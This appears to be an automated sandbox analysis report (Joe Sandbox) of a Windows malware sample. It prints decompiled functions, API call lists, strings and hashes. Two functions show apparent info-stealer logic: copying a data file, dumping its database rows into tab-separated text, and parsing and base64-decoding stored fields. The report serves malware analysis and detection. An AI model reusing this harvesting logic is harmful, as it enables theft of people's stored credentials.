strcat.MSVCRT(?,19th-century), ref: 0040DEDB
strcat.MSVCRT(?,Welsh-language), ref: 0040DEE9
strcat.MSVCRT(?,periodical), ref: 0040DEF7
strcat.MSVCRT(?,first), ref: 0040DF08
strcat.MSVCRT(?,published), ref: 0040DF16
strcat.MSVCRT(?,00411C5C), ref: 0040DF24
strcat.MSVCRT(?,William), ref: 0040DF32
strcat.MSVCRT(?,Williams), ref: 0040DF40
strcat.MSVCRT(?,00411C74), ref: 0040DF4A
strcat.MSVCRT(?,Llangollen), ref: 0040DF58
strcat.MSVCRT(?,00411C74), ref: 0040DF62
strcat.MSVCRT(?,1852), ref: 0040DF6F
strcat.MSVCRT(?,The), ref: 0040DF89
strcat.MSVCRT(?,Greal), ref: 0040DF97
strcat.MSVCRT(?,(Llangollen)), ref: 0040DFA5
strcat.MSVCRT(?,was), ref: 0040DFB3
strcat.MSVCRT(?,00411C18), ref: 0040DFC1
strcat.MSVCRT(?,19th-century), ref: 0040DFCF
strcat.MSVCRT(?,Welsh-language), ref: 0040DFDD
strcat.MSVCRT(?,periodical), ref: 0040DFEB
strcat.MSVCRT(?,first), ref: 0040DFFC
strcat.MSVCRT(?,published), ref: 0040E00A
strcat.MSVCRT(?,00411C5C), ref: 0040E018
strcat.MSVCRT(?,William), ref: 0040E026
strcat.MSVCRT(?,Williams), ref: 0040E034
strcat.MSVCRT(?,00411C74), ref: 0040E03E
strcat.MSVCRT(?,Llangollen), ref: 0040E04C
strcat.MSVCRT(?,00411C74), ref: 0040E056
strcat.MSVCRT(?,1852), ref: 0040E063

Strings

first, xrefs: 0040DF02
(Llangollen), xrefs: 0040DEAB
Llangollen, xrefs: 0040DF52
19th-century, xrefs: 0040DED5
1852, xrefs: 0040DF6D
Welsh-language, xrefs: 0040DEE3
published, xrefs: 0040DF10
Williams, xrefs: 0040DF3A
periodical, xrefs: 0040DEF1
William, xrefs: 0040DF2C
Greal, xrefs: 0040DE9D
was, xrefs: 0040DEB9

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: strcat
String ID: (Llangollen)$1852$19th-century$Greal$Llangollen$Welsh-language$William$Williams$first$periodical$published$was
API String ID: 2416929390-3946822944
Opcode ID: 416528365976af84f5051fcb1e8ffbf7c1ceb795570e286bae3f8a8000477ff5
Instruction ID: 080468a4439a029d5fc16544b1e5d49ac96535a90f4434ae472f872d229abdbf
Opcode Fuzzy Hash: 416528365976af84f5051fcb1e8ffbf7c1ceb795570e286bae3f8a8000477ff5
Instruction Fuzzy Hash: 90219DB6DC021C66CB20B7A49D49ECE73FCAF44700F11C5A2E645E2054EA789A878FA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040DBA3 Relevance: 43.6, APIs: 17, Strings: 12, Instructions: 76
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040DBA3() {
				char* _t18;
				char* _t55;
				void* _t57;
				char* _t58;
				void* _t59;
				void* _t63;

				asm("sbb eax, [ecx]");
				strcat(_t18, ??);
				strcat(_t59 - 0x81c, "Greal");
				strcat(_t59 - 0x81c, "(Llangollen)");
				strcat(_t59 - 0x81c, "was");
				strcat(_t59 - 0x81c, "a");
				strcat(_t59 - 0x81c, "19th-century");
				strcat(_t59 - 0x81c, "Welsh-language");
				strcat(_t59 - 0x81c, "periodical");
				strcat(_t59 - 0x81c, "first");
				strcat(_t59 - 0x81c, "published");
				strcat(_t59 - 0x81c, "by");
				strcat(_t59 - 0x81c, "William");
				strcat(_t59 - 0x81c, "Williams");
				strcat(_t59 - 0x81c, _t55);
				strcat(_t59 - 0x81c, "Llangollen");
				strcat(_t59 - 0x81c, _t55);
				strcat(_t59 - 0x81c, _t58);
				_pop(_t57);
				if(_t63 != 0 && _t63 == 0) {
				}
				E0040F49D(_t57); // executed
				_push("The");
			}

0x0040dba3
0x0040dba7
0x0040dbb5
0x0040dbc3
0x0040dbd1
0x0040dbdf
0x0040dbed
0x0040dbfb
0x0040dc09
0x0040dc1a
0x0040dc28
0x0040dc36
0x0040dc44
0x0040dc52
0x0040dc5c
0x0040dc6a
0x0040dc74
0x0040dc81
0x0040dc84
0x0040dc85
0x0040dc85
0x0040dc8a
0x0040dc95

APIs

strcat.MSVCRT(?,The), ref: 0040DBA7
strcat.MSVCRT(?,Greal), ref: 0040DBB5
strcat.MSVCRT(?,(Llangollen)), ref: 0040DBC3
strcat.MSVCRT(?,was), ref: 0040DBD1
strcat.MSVCRT(?,00411C18), ref: 0040DBDF
strcat.MSVCRT(?,19th-century), ref: 0040DBED
strcat.MSVCRT(?,Welsh-language), ref: 0040DBFB
strcat.MSVCRT(?,periodical), ref: 0040DC09
strcat.MSVCRT(?,first), ref: 0040DC1A
strcat.MSVCRT(?,published), ref: 0040DC28
strcat.MSVCRT(?,00411C5C), ref: 0040DC36
strcat.MSVCRT(?,William), ref: 0040DC44
strcat.MSVCRT(?,Williams), ref: 0040DC52
strcat.MSVCRT(?,00411C74), ref: 0040DC5C
strcat.MSVCRT(?,Llangollen), ref: 0040DC6A
strcat.MSVCRT(?,00411C74), ref: 0040DC74
strcat.MSVCRT(?,1852), ref: 0040DC81
strcat.MSVCRT(?,The), ref: 0040DC9B
strcat.MSVCRT(?,Greal), ref: 0040DCA9
strcat.MSVCRT(?,(Llangollen)), ref: 0040DCB7
strcat.MSVCRT(?,was), ref: 0040DCC5
strcat.MSVCRT(?,00411C18), ref: 0040DCD3
strcat.MSVCRT(?,19th-century), ref: 0040DCE1
strcat.MSVCRT(?,Welsh-language), ref: 0040DCEF
strcat.MSVCRT(?,periodical), ref: 0040DCFD
strcat.MSVCRT(?,first), ref: 0040DD0E
strcat.MSVCRT(?,published), ref: 0040DD1C
strcat.MSVCRT(?,00411C5C), ref: 0040DD2A
strcat.MSVCRT(?,William), ref: 0040DD38
strcat.MSVCRT(?,Williams), ref: 0040DD46
strcat.MSVCRT(?,00411C74), ref: 0040DD50
strcat.MSVCRT(?,Llangollen), ref: 0040DD5E
strcat.MSVCRT(?,00411C74), ref: 0040DD68
strcat.MSVCRT(?,1852), ref: 0040DD75
strcat.MSVCRT(?,The,00411BE1), ref: 0040DD92
strcat.MSVCRT(?,Greal), ref: 0040DDA0
strcat.MSVCRT(?,(Llangollen)), ref: 0040DDAE
strcat.MSVCRT(?,was), ref: 0040DDBC
strcat.MSVCRT(?,00411C18), ref: 0040DDCA
strcat.MSVCRT(?,19th-century), ref: 0040DDD8
strcat.MSVCRT(?,Welsh-language), ref: 0040DDE6
strcat.MSVCRT(?,periodical), ref: 0040DDF4
strcat.MSVCRT(?,first), ref: 0040DE05
strcat.MSVCRT(?,published), ref: 0040DE13
strcat.MSVCRT(?,00411C5C), ref: 0040DE21
strcat.MSVCRT(?,William), ref: 0040DE2F
strcat.MSVCRT(?,Williams), ref: 0040DE3D
strcat.MSVCRT(?,00411C74), ref: 0040DE47
strcat.MSVCRT(?,Llangollen), ref: 0040DE55
strcat.MSVCRT(?,00411C74), ref: 0040DE5F
strcat.MSVCRT(?,1852), ref: 0040DE71

Strings

first, xrefs: 0040DC14
(Llangollen), xrefs: 0040DBBD
Llangollen, xrefs: 0040DC64
19th-century, xrefs: 0040DBE7
1852, xrefs: 0040DC7F
Welsh-language, xrefs: 0040DBF5
published, xrefs: 0040DC22
Williams, xrefs: 0040DC4C
periodical, xrefs: 0040DC03
William, xrefs: 0040DC3E
Greal, xrefs: 0040DBAF
was, xrefs: 0040DBCB

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: strcat
String ID: (Llangollen)$1852$19th-century$Greal$Llangollen$Welsh-language$William$Williams$first$periodical$published$was
API String ID: 2416929390-3946822944
Opcode ID: 549854048510fb95757aa128ab9b7d36a57087377d9e1197bb0025e24b002f82
Instruction ID: 447cbe565363e0bfb25d87474b1a87b180d6b9b9465e3d0a7bc52205a31bfe3a
Opcode Fuzzy Hash: 549854048510fb95757aa128ab9b7d36a57087377d9e1197bb0025e24b002f82
Instruction Fuzzy Hash: C7219DB6DC021C6ACB20B7A49D45ECE73ECAF54700F11C5A2E645E2055EA789A87CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040764C Relevance: 34.8, APIs: 23, Instructions: 309
stringmemoryfileCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040764C(void* __ecx, void* __eflags, CHAR* _a4, char _a16, char _a28, char _a40) {
				void _v8;
				char _v12;
				char _v16;
				char _v28;
				CHAR* _v40;
				char _v52;
				char _v64;
				char _v76;
				char _v88;
				char _v100;
				char _v112;
				char _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t115;
				void* _t154;
				long _t172;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t201;
				void* _t203;
				void* _t205;
				void* _t235;
				char* _t238;
				void* _t239;
				void* _t240;
				void* _t245;
				void* _t259;
				char* _t265;
				char* _t292;
				char* _t293;
				void* _t294;
				void* _t295;
				void* _t297;
				void* _t298;

				_t299 = __eflags;
				_t239 = __ecx;
				E004100ED( &_v40, __eflags, 0x411be1);
				E0041018C(E00410208( &_v40, _t239,  &_v124, __eflags,  *0x6153e4), _t239,  &_v40);
				E00401859(_v124);
				_t115 = E0040EEA9(0x411be1,  &_v112, _t299, 0x1a);
				_pop(_t240);
				E0041018C(E004101C6( &_v40, _t240, _t115,  &_v124, _t299), _t240,  &_v40);
				E00401859(_v124);
				E00401859(_v112);
				CopyFileA(_a4, _v40, 1);
				E004100ED( &_v28, _t299, 0x411be1);
				E0041018C(E00410208( &_v28, _t240,  &_v124, _t299,  *0x6151c4), _t240,  &_v28);
				E00401859(_v124);
				E0041018C(E00410208( &_v28, _t240,  &_v124, _t299, 0x411be4), _t240,  &_v28);
				E00401859(_v124);
				E0041018C(E004101C6( &_v28, _t240,  &_a28,  &_v124, _t299), _t240,  &_v28);
				E00401859(_v124);
				E0041018C(E00410208( &_v28, _t240,  &_v124, _t299, "_"), _t240,  &_v28);
				E00401859(_v124);
				E0041018C(E00410208(E004101C6( &_v28, _t240,  &_a16,  &_v112, _t299), _t240,  &_v124, _t299,  *0x615248), _t240,  &_v28);
				E00401859(_v124);
				E00401859(_v112);
				_t154 =  *0x6155c0(_a4,  &_v16);
				if(_t154 == 0) {
					_t172 =  *0x61557c(_v16,  *0x615148, 0xffffffff,  &_v12, _t154);
					_t295 = _t294 + 0x14;
					if(_t172 == 0) {
						_t176 = RtlAllocateHeap(GetProcessHeap(), _t172, 0x5f5e0ff);
						_v8 = _t176;
						_t177 =  *0x615598(_v12);
						_pop(_t245);
						_t302 = _t177 - 0x64;
						if(_t177 == 0x64) {
							_t238 = "0";
							_t265 = "\t";
							do {
								E004100ED( &_v124, _t302,  *0x6155b4(_v12, 0));
								E004100ED( &_v64, _t302,  *0x6155b4(_v12, 1));
								E004100ED( &_v112, _t302,  *0x6155b4(_v12, 2));
								E004100ED( &_v52, _t302,  *0x6155b4(_v12, 3));
								E004100ED( &_v100, _t302,  *0x6155b4(_v12, 4));
								E004100ED( &_v88, _t302,  *0x6155b4(_v12, 5));
								_t201 =  *0x6155b4(_v12, 6);
								_pop(_t259);
								E004100ED( &_v76, _t302, _t201);
								_t203 =  *0x615784(_v64, _t238);
								_t292 =  &_v64;
								if(_t203 != 0) {
									_push( *0x615048);
								} else {
									_push( *0x615334);
								}
								E00410148(_t259, _t292);
								_t205 =  *0x615784(_v52);
								_t293 =  &_v52;
								if(_t205 != 0) {
									_push( *0x615048);
								} else {
									_push( *0x615334);
								}
								E00410148(_t259, _t293);
								 *0x61575c(_v8, _v124);
								 *0x61575c(_v8, _t265);
								 *0x61575c(_v8, _v64);
								 *0x61575c(_v8, _t265);
								 *0x61575c(_v8, _v112);
								 *0x61575c(_v8, _t265);
								 *0x61575c(_v8, _v52);
								 *0x61575c(_v8, _t265);
								 *0x61575c(_v8, _v100);
								 *0x61575c(_v8, _t265);
								 *0x61575c(_v8, _v88);
								 *0x61575c(_v8, _t265);
								 *0x61575c(_v8, _v76);
								 *0x61575c(_v8, "\n");
								E00401859(_v76);
								E00401859(_v88);
								E00401859(_v100);
								E00401859(_v52);
								E00401859(_v112);
								E00401859(_v64);
								E00401859(_v124);
								_t235 =  *0x615598(_v12);
								_pop(_t245);
							} while (_t235 == 0x64);
						}
						_t178 =  *0x61567c(_v8);
						_t306 = _t178 - 5;
						if(_t178 > 5) {
							_push( *0x61567c(_v8));
							_push(_v8);
							_t297 = _t295 - 0xc;
							E0041011F( &_v28, _t245, _t297, _t306);
							_t298 = _t297 - 0x50;
							E004016EB( &_a40, _t298);
							_push( &_v124);
							E00403F95(_t245, _t306);
							_t295 = _t298 + 0x68;
							E00401859(_v124);
						}
						memset( &_v8, 0, 4);
					}
					 *0x61559c(_v12);
					 *0x6155c4(_v16);
				}
				DeleteFileA(_v40);
				E00401859(_v40);
				E00401859(_v28);
				E00401859(0);
				E00401859(0);
				E00401859(_a4);
				E00401859(_a16);
				E00401859(_a28);
				return E004016CC( &_a40);
			}

0x0040764c
0x0040764c
0x0040765e
0x00407677
0x0040767f
0x00407689
0x00407690
0x0040769f
0x004076a7
0x004076af
0x004076bc
0x004076c6
0x004076df
0x004076e7
0x004076ff
0x00407707
0x0040771d
0x00407725
0x0040773d
0x00407745
0x00407769
0x00407771
0x00407779
0x00407785
0x0040778f
0x004077a5
0x004077ab
0x004077b0
0x004077c3
0x004077cc
0x004077cf
0x004077d5
0x004077d6
0x004077d9
0x004077df
0x004077e4
0x004077e9
0x004077fa
0x00407810
0x00407826
0x0040783c
0x00407852
0x00407868
0x00407872
0x00407879
0x0040787e
0x00407887
0x0040788d
0x00407892
0x0040789c
0x00407894
0x00407894
0x00407894
0x004078a2
0x004078ab
0x004078b1
0x004078b6
0x004078c0
0x004078b8
0x004078b8
0x004078b8
0x004078c6
0x004078d1
0x004078db
0x004078e7
0x004078f1
0x004078fd
0x00407907
0x00407913
0x0040791d
0x00407929
0x00407933
0x0040793f
0x00407949
0x00407955
0x00407963
0x0040796c
0x00407974
0x0040797c
0x00407984
0x0040798c
0x00407994
0x0040799c
0x004079a4
0x004079aa
0x004079ab
0x004077e9
0x004079b7
0x004079bd
0x004079c0
0x004079cb
0x004079cc
0x004079d2
0x004079d7
0x004079dc
0x004079e4
0x004079ec
0x004079ed
0x004079f5
0x004079f8
0x004079f8
0x00407a05
0x00407a0b
0x00407a11
0x00407a1a
0x00407a21
0x00407a25
0x00407a2e
0x00407a36
0x00407a3d
0x00407a44
0x00407a4c
0x00407a54
0x00407a5c
0x00407a6d

APIs

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

Part of subcall function 00410208: lstrlen.KERNEL32(H@A,76636410,?,0040E45B,00414048,00000000,00414048,00000000), ref: 0041021C
Part of subcall function 00410208: lstrcpy.KERNEL32(00000000,?), ref: 00410244
Part of subcall function 00410208: lstrcat.KERNEL32(?,00000000), ref: 0041024F

Part of subcall function 0041018C: lstrcpy.KERNEL32(00000000,?), ref: 004101BC

Part of subcall function 0040EEA9: GetSystemTime.KERNEL32(?,00411BE1,00000000,?,?,?,?,?,?,?,00403A28,00000014), ref: 0040EECE

Part of subcall function 004101C6: lstrcpy.KERNEL32(00000000,?), ref: 004101F4
Part of subcall function 004101C6: lstrcat.KERNEL32(?,00000000), ref: 004101FE

CopyFileA.KERNEL32(?,?,00000001), ref: 004076BC
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004077BC
RtlAllocateHeap.NTDLL(00000000), ref: 004077C3
StrCmpCA.SHLWAPI(?,0041404C,00000000), ref: 00407887
StrCmpCA.SHLWAPI(?,0041404C), ref: 004078AB
lstrcat.KERNEL32(004080EB,?), ref: 004078D1
lstrcat.KERNEL32(004080EB,00414050), ref: 004078DB
lstrcat.KERNEL32(004080EB,?), ref: 004078E7
lstrcat.KERNEL32(004080EB,00414050), ref: 004078F1
lstrcat.KERNEL32(004080EB,?), ref: 004078FD
lstrcat.KERNEL32(004080EB,00414050), ref: 00407907
lstrcat.KERNEL32(004080EB,?), ref: 00407913
lstrcat.KERNEL32(004080EB,00414050), ref: 0040791D
lstrcat.KERNEL32(004080EB,?), ref: 00407929
lstrcat.KERNEL32(004080EB,00414050), ref: 00407933
lstrcat.KERNEL32(004080EB,?), ref: 0040793F
lstrcat.KERNEL32(004080EB,00414050), ref: 00407949
lstrcat.KERNEL32(004080EB,?), ref: 00407955
lstrcat.KERNEL32(004080EB,00414044), ref: 00407963
lstrlen.KERNEL32(004080EB), ref: 004079B7
lstrlen.KERNEL32(004080EB), ref: 004079C5
memset.MSVCRT ref: 00407A05
DeleteFileA.KERNEL32(?,?), ref: 00407A25

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: 69f5eb418eb9f3da564a78cf4dc32094a69d8b4610791dc917fa7ec0c481709b
Instruction ID: 922ce2a1993777e6ddc590acb3f991654a3e57233ff60a3b69a4086682a63145
Opcode Fuzzy Hash: 69f5eb418eb9f3da564a78cf4dc32094a69d8b4610791dc917fa7ec0c481709b
Instruction Fuzzy Hash: 9FC1B732D04109EBDF11BBA1ED4AACDBB7AEF44308F14802AF502B70B1DB756E959B44

Uniqueness

Uniqueness Score: -1.00%

Function 00407249 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 291
fileCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00407249(void* __ebx, void* __edi, void* __esi, char _a4, char _a16, char _a28) {
				char* _v8;
				char* _v12;
				CHAR* _v24;
				void* _v28;
				char _v40;
				char _v52;
				long _v56;
				char _v68;
				char _v80;
				char _v92;
				char _v104;
				char _v116;
				char _v128;
				char _v140;
				char _v152;
				char _v164;
				char _v176;
				char _v188;
				char _v200;
				char _v212;
				char _v224;
				intOrPtr _t86;
				long _t108;
				void* _t111;
				char* _t113;
				char* _t116;
				char* _t164;
				char* _t167;
				void* _t173;
				char* _t186;
				char* _t189;
				void* _t195;
				char* _t213;
				intOrPtr* _t220;
				void* _t223;
				signed int _t224;
				void* _t226;
				void* _t233;
				void* _t241;

				_t233 = __esi;
				_t226 = __edi;
				_push(_a28);
				if( *0x6155b0() == 0) {
					_t86 =  *0x615584; // 0x0
					_t224 = 0;
					_t220 = 0x615584;
					if(_t86 == 0) {
						L4:
						_push(_t233);
						_push(_t226);
						E004100ED( &_v24, _t278, 0x411be1);
						E0041018C(E004101C6( &_v24, _t220,  &_a28,  &_v40, _t278), _t220,  &_v24);
						E00401859(_v40);
						E0041018C(E00410208( &_v24, _t220,  &_v40, _t278, 0x411be4), _t220,  &_v24);
						E00401859(_v40);
						E0041018C(E00410208( &_v24, _t220,  &_v52, _t278,  *0x615550), _t220,  &_v24);
						E00401859(_v52);
						_t241 = CreateFileA(_v24, 0x80000000, 1, 0, 3, 0, 0);
						_v28 = _t241;
						if(_t241 != 0) {
							SetFilePointer(_t241, 0, 0, 2);
							_t108 = GetFileSize(_t241, 0);
							_t229 = _t108;
							SetFilePointer(_t241, 0, 0, 0);
							_t20 = _t229 + 1; // 0x1
							_t111 = malloc(_t20);
							_t222 =  &_v56;
							_v12 = _t111;
							ReadFile(_t241, _t111, _t108,  &_v56, 0);
							_t113 = StrStrA(_v12,  *0x615108);
							_v8 = _t113;
							_t280 = _t113;
							if(_t113 != 0) {
								do {
									_v8 =  &(_v8[0x10]);
									_t116 = StrStrA(_v8,  *0x6152b0) - 3;
									_v12 = _t116;
									 *_t116 = 0;
									E0041018C(E00410208(0x6159e0,  &_v56,  &_v52, _t280,  *0x6152c8),  &_v56, 0x6159e0);
									E00401859(_v52);
									E0041018C(E004101C6(0x6159e0, _t222,  &_a16,  &_v40, _t280), _t222, 0x6159e0);
									E00401859(_v40);
									E0041018C(E00410208(0x6159e0, _t222,  &_v116, _t280, "\n"), _t222, 0x6159e0);
									E00401859(_v116);
									E0041018C(E00410208(0x6159e0, _t222,  &_v92, _t280,  *0x61507c), _t222, 0x6159e0);
									E00401859(_v92);
									E0041018C(E004101C6(0x6159e0, _t222,  &_a4,  &_v164, _t280), _t222, 0x6159e0);
									E00401859(_v164);
									_t232 = "\n";
									E0041018C(E00410208(0x6159e0, _t222,  &_v68, _t280, "\n"), _t222, 0x6159e0);
									E00401859(_v68);
									E0041018C(E00410208(0x6159e0, _t222,  &_v212, _t280,  *0x6150b4), _t222, 0x6159e0);
									E00401859(_v212);
									E0041018C(E00410208(0x6159e0, _t222,  &_v140, _t280, _v8), _t222, 0x6159e0);
									E00401859(_v140);
									E0041018C(E00410208(0x6159e0, _t222,  &_v188, _t280, "\n"), _t222, 0x6159e0);
									E00401859(_v188);
									_t164 = StrStrA( &(_v12[1]),  *0x615404);
									_v8 =  &(_t164[0x14]);
									_t167 = StrStrA( &(_t164[0x14]),  *0x615400) - 3;
									_v12 = _t167;
									 *_t167 = 0;
									E0041018C(E00410208(0x6159e0, _t222,  &_v80, _t280,  *0x615044), _t222, 0x6159e0);
									E00401859(_v80);
									_t173 = E0040715C(_v8);
									_pop(_t223);
									E0041018C(E00410208(0x6159e0, _t223,  &_v104, _t280, _t173), _t223, 0x6159e0);
									E00401859(_v104);
									E0041018C(E00410208(0x6159e0, _t223,  &_v128, _t280, "\n"), _t223, 0x6159e0);
									E00401859(_v128);
									_t186 = StrStrA( &(_v12[1]),  *0x615400);
									_v8 =  &(_t186[0x14]);
									_t189 = StrStrA( &(_t186[0x14]),  *0x6154dc) - 3;
									_v12 = _t189;
									 *_t189 = 0;
									E0041018C(E00410208(0x6159e0, _t223,  &_v152, _t280,  *0x6151f0), _t223, 0x6159e0);
									E00401859(_v152);
									_t195 = E0040715C(_v8);
									_pop(_t222);
									E0041018C(E00410208(0x6159e0, _t222,  &_v176, _t280, _t195), _t222, 0x6159e0);
									E00401859(_v176);
									E0041018C(E00410208(0x6159e0, _t222,  &_v200, _t280, "\n"), _t222, 0x6159e0);
									E00401859(_v200);
									E0041018C(E00410208(0x6159e0, _t222,  &_v224, _t280, _t232), _t222, 0x6159e0);
									E00401859(_v224);
									_t213 = StrStrA( &(_v12[1]),  *0x615108);
									_v8 = _t213;
								} while (_t213 != 0);
								_t241 = _v28;
							}
							CloseHandle(_t241);
						}
						 *0x6155c8();
						E00401859(_v24);
					} else {
						do {
							_t220 = _t220 + 1;
							_t224 = _t224 * 0xa + _t86 - 0x30;
							_t86 =  *_t220;
						} while (_t86 != 0);
						_t278 = _t224 - 0x20;
						if(_t224 < 0x20) {
							goto L4;
						}
					}
				}
				E00401859(_a4);
				E00401859(_a16);
				return E00401859(_a28);
			}

0x00407249
0x00407249
0x00407252
0x0040725e
0x00407264
0x0040726c
0x0040726e
0x00407275
0x00407291
0x00407291
0x00407292
0x0040729b
0x004072b1
0x004072b9
0x004072d1
0x004072d9
0x004072f2
0x004072fa
0x00407314
0x00407316
0x0040731b
0x00407326
0x0040732e
0x00407338
0x0040733a
0x00407340
0x00407344
0x0040734c
0x00407353
0x00407356
0x00407365
0x0040736b
0x0040736e
0x00407370
0x0040737b
0x00407381
0x00407394
0x00407397
0x0040739a
0x004073a9
0x004073b1
0x004073c5
0x004073cd
0x004073e3
0x004073eb
0x00407402
0x0040740a
0x00407421
0x0040742c
0x00407431
0x00407443
0x0040744b
0x00407465
0x00407470
0x00407487
0x00407492
0x004074a7
0x004074b2
0x004074c2
0x004074d2
0x004074e1
0x004074e4
0x004074e7
0x004074f6
0x004074fe
0x00407506
0x0040750b
0x00407519
0x00407521
0x00407533
0x0040753b
0x0040754b
0x0040755b
0x0040756a
0x0040756d
0x00407570
0x00407582
0x0040758d
0x00407595
0x0040759a
0x004075ab
0x004075b6
0x004075cb
0x004075d6
0x004075eb
0x004075f6
0x00407606
0x0040760c
0x0040760f
0x00407617
0x00407617
0x0040761b
0x0040761b
0x00407621
0x0040762a
0x00407277
0x00407277
0x0040727d
0x0040727e
0x00407282
0x00407284
0x00407288
0x0040728b
0x00000000
0x00000000
0x0040728b
0x00407631
0x00407635
0x0040763d
0x0040764b

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00411BE4,00411BE1,?,?,?), ref: 0040730E
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?), ref: 00407326
GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0040732E
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 0040733A
malloc.MSVCRT ref: 00407344
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 00407356
StrStrA.SHLWAPI(?), ref: 00407365
StrStrA.SHLWAPI(00000010), ref: 00407388
StrStrA.SHLWAPI(?,00414044,00000010,00414044,00414044), ref: 004074C2
StrStrA.SHLWAPI(-00000014), ref: 004074D5
StrStrA.SHLWAPI(?,00414044,00000000), ref: 0040754B
StrStrA.SHLWAPI(-00000014), ref: 0040755E

Part of subcall function 00410208: lstrlen.KERNEL32(H@A,76636410,?,0040E45B,00414048,00000000,00414048,00000000), ref: 0041021C
Part of subcall function 00410208: lstrcpy.KERNEL32(00000000,?), ref: 00410244
Part of subcall function 00410208: lstrcat.KERNEL32(?,00000000), ref: 0041024F

Part of subcall function 0041018C: lstrcpy.KERNEL32(00000000,?), ref: 004101BC

Part of subcall function 0040715C: memset.MSVCRT ref: 00407183
Part of subcall function 0040715C: lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0040719E
Part of subcall function 0040715C: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 004071A8
Part of subcall function 0040715C: memcpy.MSVCRT ref: 0040720C

StrStrA.SHLWAPI(?,00414044,00414044,00000000), ref: 00407606
CloseHandle.KERNEL32(00000000), ref: 0040761B

Strings

Ya, xrefs: 00407376

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: File$Pointerlstrcpylstrlen$BinaryCloseCreateCryptHandleReadSizeStringlstrcatmallocmemcpymemset
String ID: Ya
API String ID: 2881474955-3053265743
Opcode ID: c4d35cb32fe0c06311663cb169589c9f0e6cc089352d1a017f5649752b036210
Instruction ID: 6722487de7d888103b8ce6c50e9213c3e31a508cd4fd580ac932b8132543711e
Opcode Fuzzy Hash: c4d35cb32fe0c06311663cb169589c9f0e6cc089352d1a017f5649752b036210
